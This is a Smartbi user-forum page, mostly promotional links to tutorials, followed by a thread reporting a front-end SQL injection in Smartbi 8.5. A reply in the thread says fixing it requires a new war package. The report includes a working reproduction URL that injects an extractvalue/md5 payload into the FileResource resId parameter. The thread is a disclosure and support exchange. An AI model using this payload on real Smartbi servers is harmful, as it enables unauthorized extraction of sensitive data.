提问题
提建议
科技浪潮不息,八月下旬再度升级!全新科技感主题、深度技术解析、AI术语入门+Prompt详解,助你稳步进阶,智赢未来!
《【AI每日一学知识问答】学习AI必须了解的相关术语》→术语虽基础,却是AI沟通的桥梁。快来挑战一下,看看你掌握了多少!《【BI知识闯关】数据层层剥茧,洞见核心!报表下钻功能全解析》→检验你是否真的了解下钻的使用
《科技感大标题(第三版)》→科技感视觉主题,深色科技风跃动,光线流动引爆焦点!
《数据层层剥茧,洞见核心!报表下钻功能全解析》→聚焦电子表格和仪表盘,手把手教你在两种主流报表中实现各类下钻场景!
《组件传值筛选器使用指南》→从四个组件传值筛选器的示例出发,带您深入理解组件传值的过程,实现特定的需求。
《学习AI必须了解的相关术语》→聚焦那些高频出现、必须理解记忆的AI相关名词术语,帮助大家扫清概念障碍,更自信地畅游AI世界!
《在AI语境里,介绍一下Prompt(提示词/提示)》→学会设计Prompt,能更精准地“驾驭”AI,让它真正成为你的得力助手!解锁与AI高效对话的钥匙。
Smarbi 前台存在 SQL 注入漏洞,攻击者可以利用漏洞获取系统 中的敏感信息。
smartbi版本:Version:8.5.42692.18463
复现方式:https://域名/smartbi/vision/FileResource?op=OPEN&resId=LOGIN_BG_IMG%27%20AND%20extractvalue(1,%20concat(0,%20md5(%27yhrue%27)))
已更新最新补丁,还是可以复现这个漏洞
使用道具 赞 举报
是的补丁是最新的,但是不生效
部署是在windows系统
您这个具体的版本可以看下吗,这个漏洞已经修复过了,但是得更新war包,目前无法通过更新补丁包解决
是要看打包时间呢
是的
本版积分规则 发表回复 回帖后跳转到最后一页
Smartbi新手任务奖励288麦豆
学习心得分享——数据分析学习之旅
原创案例分享大赛正式启动,至高800麦豆等你来领取!
赢取100麦豆,解锁数据分析新技能!
Smartbi进阶任务奖励500麦豆
免费
